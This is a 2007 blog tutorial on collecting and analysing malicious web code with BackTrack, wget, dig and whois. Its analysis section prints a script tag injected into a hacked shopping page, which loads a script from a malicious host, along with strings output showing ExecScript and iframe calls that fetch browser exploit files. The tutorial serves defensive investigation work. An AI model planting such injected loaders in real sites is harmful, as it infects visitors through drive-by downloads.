Wednesday, January 31, 2007

Cursory Malware Analysis Techniques with Common Tools

Review of using BackTrack to do cursory evaluation and tracing of captured malcode.

Get BackTrack

Get the BackTrack ISO from http://www.remote-exploit.org/backtrack_download.html and burn it to CD.

Getting Started

Boot your machine with Backtrack. At the command prompt screen, login as root. Issue commands to setup the network and start X windows.

slax ~ # ifconfig eth0 up
slax ~ # dhcpcd -i eth0

Confirm you have a valid IP address.

slax ~ # ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:06:5B:A1:9F:06
inet addr:192.168.1.151 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::206:5bff:fea1:9f06/64 Scope:Link
UP BROADCAST NOTRAILERS RUNNING MULTICAST MTU:1500 Metric:1
RX packets:117652 errors:0 dropped:0 overruns:1 frame:0
TX packets:12714 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:22401571 (21.3 Mb) TX bytes:2096818 (1.9 Mb)
Interrupt:18 Base address:0xc800

Start graphical mode.

slax ~ # startx

The machine will now enter graphical mode. When done, open a command window by clicking the black computer screen icon at the bottom left of the screen.

Navigate to /mnt. See what is attached to the machine.

slax ~ # cd /mnt
slax mnt # ls
floppy/ hda1/ hda5/ hdb1/ hdc_cdrom/ hdd_cdrom/ live/

Insert your USB stick and mount it.

slax mnt # ls
floppy/ hda1/ hda5/ hdb1/ hdc_cdrom/ hdd_cdrom/ live/ sda1_removable/
slax mnt # mkdir sd
slax mnt # mount /dev/sda1 /mnt/sd
slax mnt # ls
floppy/ hda1/ hda5/ hdb1/ hdc_cdrom/ hdd_cdrom/ live/ sd/ sda1_removable/

Confirm you are mounted to /mnt/sd

slax mnt # mount
...
/dev/sda1 on /mnt/sd type vfat (rw)

Now that you're set up, the next page will continue with collection of the malcode samples.

{mospagebreak}

Collecting Samples

Enter the drive. Create a new folder for your analysis work.

slax mnt # cd sd
slax sd # mkdir www.malcodedomain.com
slax sd # ls
www.malcodedomain.com/

Enter your new directory. Copy in the wget retrieval script for use with this analysis.

slax sd # cd www.malcodedomain.com
slax www.malcodedomain.com # cp ../get_links.sh .
slax www.malcodedomain.com # ls
get_links.sh*

Here is what the get_links.sh file looks like.

slax infotechnow.com # cat get_links.sh
#!/bin/bash
for i in `cat $1`; do
# wget to pull down files
# -t1 retry once
# -T20 wait 20 seconds, then timeout and move on
# -x use directory structure. Prevents overwrites.
# -U use the common Internet Explorer user agent string for two reasons. 1) Helps elude detection by perpetrator that their code has been compromosed. 2) some malcode compares the user agent and does not attempt exploit on non-compatible clients, defeating code collection.
# --save-cookies might want these
echo $i;
wget -t 1 -T 20 -x -U "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" --save-cookies=cookies.txt "$i" | tee wget_log.txt;
done;
ls -R

Create a file with a list of the URIs that you will investigate. Remember to be inventive with how you search, as some minor modifications may yield greater returns than the initial query. An example would be to pull any possible directory listings to expand target scope. Another would be to search for number variants for a file, say wxp521.bad. Look for wxp522.bad and others between 500-550. Try to pull dynamic pages (asp, php) without their arguments as well.

slax www.malcodedomain.com # vi links
slax www.malcodedomain.com # cat links
http://www.malcodedomain.com/dir/dir/detected_bad_page.asp?maybe_you_have_args
http://www.malcodedomain.com/dir/dir/detected_bad_page.asp
http://www.malcodedomain.com/dir/dir
http://www.malcodedomain.com/dir/
http://www.malcodedomain.com
http://relatedmaldomain.cc
http://relatedmaldomain.cc/dir/
http://relatedmaldomain.cc/dir/badfile.js

Run the get_links script to do the initial pull. Files will be saved in the same directory hierarchy they had on the target server.

slax www.malcodedomain.com # ./get_link.sh links
slax www.malcodedomain.com # ls
cookies.txt* get_links.sh* links* wget_log.txt* www.malcodedomain.com/

As you see, the script creates a log for wget errors, records the cookies, and creates the site directory with appropriated result files in it.

On the next page, we'll explore gathering the online records to identify owners and possible contacts for future action.

{mospagebreak}

Gathering Records

To do an investigation, you need to know about the site you are targeting. WHOIS and DNS are good sources to gather some information.

Retrieve the DNS records for query resolution and reverse resolution of the target domain. 'example.net' is used as an example.

slax www.malcodedomain.com # dig example.net | tee DNS_example.net

; <<>> DiG 9.3.1 <<>> example.net
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 2663 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 5, ADDITIONAL: 5 ;; QUESTION SECTION: ;example.net. IN A ;; ANSWER SECTION: example.net. 60 IN A 11.22.33.44

;; AUTHORITY SECTION:
example.net. 86400 IN NS ns4.mydyndns.org.
example.net. 86400 IN NS ns5.mydyndns.org.
example.net. 86400 IN NS ns1.mydyndns.org.
example.net. 86400 IN NS ns2.mydyndns.org.
example.net. 86400 IN NS ns3.mydyndns.org.

;; ADDITIONAL SECTION:
ns1.mydyndns.org. 79664 IN A 63.208.196.92
ns2.mydyndns.org. 79314 IN A 204.13.249.82
ns3.mydyndns.org. 36138 IN A 204.13.250.82
ns4.mydyndns.org. 80774 IN A 213.155.150.206
ns5.mydyndns.org. 80774 IN A 63.208.196.93

;; Query time: 168 msec
;; SERVER: 192.168.1.4#53(192.168.1.4)
;; WHEN: Wed Jan 31 14:19:09 2007
;; MSG SIZE rcvd: 231

slax www.malcodedomain.com # dig -x example.net | tee DNS_example.net_ptr

; <<>> DiG 9.3.1 <<>> -x example.net
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 26216 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0 ;; QUESTION SECTION: ;net.example.in-addr.arpa. IN PTR ;; AUTHORITY SECTION: in-addr.arpa. 10800 IN SOA A.ROOT-SERVERS.NET. dns-ops.ARIN.NET. 2007013116 1800 900 691200 10800 ;; Query time: 94 msec ;; SERVER: 192.168.1.4#53(192.168.1.4) ;; WHEN: Wed Jan 31 14:19:29 2007 ;; MSG SIZE rcvd: 113

As you can see, 'example.net' is a dynamic hosted site with no return PTR record. Now do an in-addr.arpa query on the IP to determine the ISP.

slax www.malcodedomain.com # dig -x 11.22.33.44 | tee DNS_11.22.33.44

; <<>> DiG 9.3.1 <<>> -x 11.22.33.44
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 36217 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2 ;; QUESTION SECTION: ;44.33.22.11.in-addr.arpa. IN PTR ;; ANSWER SECTION: 44.33.22.11.in-addr.arpa. 86400 IN PTR user-xx.cable.mindspring.com.

;; AUTHORITY SECTION:
254.133.66.in-addr.arpa. 10951 IN NS scratchy.earthlink.net.
254.133.66.in-addr.arpa. 10951 IN NS itchy.earthlink.net.

;; ADDITIONAL SECTION:
itchy.earthlink.net. 59942 IN A 207.69.188.196
scratchy.earthlink.net. 74609 IN A 207.69.188.197

;; Query time: 79 msec
;; SERVER: 192.168.1.4#53(192.168.1.4)
;; WHEN: Wed Jan 31 14:21:18 2007
;; MSG SIZE rcvd: 179

Looks like an Earthlink cable customer. Now pull the WHOIS information for the domain and IP.

slax www.malcodedomain.com # whois 11.22.33.44 | tee WHOIS_11.22.33.44
EarthLink, Inc. ERLK-CBL-TW-WEST (NET-11-22-33-0-1)
11.22.33.0 - 11.22.255.255
EARTHLINK, INC ERLK-TW-HAWAII01 (NET-11-22-33-0-1)
11.22.33.0 - 11.22.255.255

# ARIN WHOIS database, last updated 2007-01-30 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

Notice the first draw only came up with referring netblock information. Replace the original query with the netblock to get usable information.

slax www.malcodedomain.com # whois NET-11-22-33-0-1 | tee WHOIS_11.22.33.44
CustName: EARTHLINK, INC
Address: 1375 PEACHTREE STREET, LEVEL A
City: ATLANTA
StateProv: GA
PostalCode: 30309
Country: US
RegDate: 2006-11-17
Updated: 2006-11-17

NetRange: 11.22.33.0 - 11.22.255.255
CIDR: 11.22.33.0/20
NetName: ERLK-TW-HAWAII01
NetHandle: NET-11-22-33-0-1
Parent: NET-11-22-33-0-1
NetType: Reassigned
Comment:
RegDate: 2006-11-17
Updated: 2006-11-17

OrgAbuseHandle: ABUSE60-ARIN
OrgAbuseName: ABUSE TEAM
OrgAbusePhone: +1-404-815-0770
OrgAbuseEmail: abuse@abuse.earthlink.net

OrgTechHandle: ELNK-ORG-ARIN
OrgTechName: EarthLink, Inc.
OrgTechPhone: +1-404-815-0770
OrgTechEmail: arin_tech@lists.corp.earthlink.net

# ARIN WHOIS database, last updated 2007-01-30 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

slax www.malcodedomain.com # whois example.net | tee WHOIS_example.net

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.


Domain Name: EXAMPLE.NET
Registrar: GO DADDY SOFTWARE, INC.
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS1.MYDYNDNS.ORG
Name Server: NS2.MYDYNDNS.ORG
Status: clientDeleteProhibited
Status: clientRenewProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 15-jul-2006
Creation Date: 30-dec-2003
Expiration Date: 30-dec-2013

>>> Last update of whois database: Thu, 01 Feb 2007 00:22:57 UTC <<< ... Registrant: EXAMPLE xxxxxx St xxxxxxx, xx nnnnn United States Registered through: GoDaddy.com, Inc. (http://www.godaddy.com) Domain Name: EXAMPLE.NET Created on: 30-Dec-03 Expires on: 30-Dec-13 Last Updated on: 09-Apr-04 Administrative Contact: EXAMPLE xx@xx.xxx xxxxxx St xxxxxxx, xx nnnnn United States 5555555555 Fax -- Technical Contact: EXAMPLE xx@xx.xxx xxxxxx St xxxxxxx, xx nnnnn United States 5555555555 Fax -- Domain servers in listed order: NS1.MYDYNDNS.ORG NS2.MYDYNDNS.ORG

The target is confirmed to be a dynamic domain. The target server is hosted on a cable link through Earthlink. The data even has contact information, though this may be falsified in the case of a malicious domain.

Repeat this process for each newly discovered IP and domain.

On the next page, we explore basic methods to analyze collected malware.

{mospagebreak}

Analysis

Now we switch to a live example to demonstrate the rest of the process. The following was taken during an investigation of infotechnow.com and its hacked referral to a malcode hosting site.

slax infotechnow.com # cd /mnt/sd/infotechnow.com

The original detection was an inserted code redirect at infotechnow.com. Let's start there.

slax infotechnow.com # cd www.infotechnow.com
slax www.infotechnow.com # ls
shopping/
slax www.infotechnow.com # cd shopping
slax shopping # ls
default.asp* index.html* shopdisplaycategories.asp*

Look at each file and determine the malcode.

slax shopping # cat shopdisplaycategories.asp



meta equiv="Content-Language" content="en-us">
...

The code is pretty long, so here is the pertinent part. Notice that encoded script in the middle of the formatted HTML code. Here's the specific code we seek.

a href="hp://www.infotechnow.com/shopping/shopdisplayproducts.asp?id=3&cat=Floppy%2C+Zip">Floppy, Zip
a href="http://www.blogger.com/shopping/shopdisplaycategories.asp?id=262&cat=GPS%3Cscript+src%3D%22%20http%3A%2F%2Fijk%2Ecc%2FE%2FJ%2EJS%22%3E%3C%2Fscript%3E".GPS.script src="http://ijk.cc/E/J.JS"../script../a../span..a href="http://www.blogger.com/shopping/shopdisplaycategories.asp?id=193&cat=Hard+Drives".Hard Drives./a.

The user clicks on a link for GPS units, and is redirected to malcode host site 'ijk.cc' to execute file 'j.js'. Add this to the links list and grab it.

Now navigate to your new captured file and analyze it with 'strings'.

slax infotechnow.com # cd ijk.cc
slax ijk.cc # cd e
slax e # ls
ff104/ ff154/ ie_onload.js* index.html* isci/ j.js* j_js_decodes* ms06044/ vml/
slax e # strings j.js | tee STRINGS_j_js

Read through the output and note interesting features in your report. Collect any referred URIs or scripts, add them to the links list, and collect them. Examples of a few interesting items in j.js follows:

ExecScript("http://" + server_addr + "/E/isci/isci_my.js");
ExecScript("http://" + server_addr + "/E/ff154/ff154.js");
ExecScript("http://" + server_addr + "/E/ff104/ff104.js");
var my_src = 'http://'+server_addr+'/E/ms06044/ww.js';
ExecIframe('http://'+server_addr+'/E/ms06044/ms06044.htm');
ExecIframe('http://'+server_addr+'/E/vml/vml.htm');
document.write("/E/ie_onload.js'><"+"/script>");

And so on. As mentioned, add discovered files to the links list and grab them.

Analysis helps you identify files, directories and other servers to pursue. You may be drawn to other sites, files and directories. Be persistent and follow all of the available branches.

Rinse and repeat.

No comments: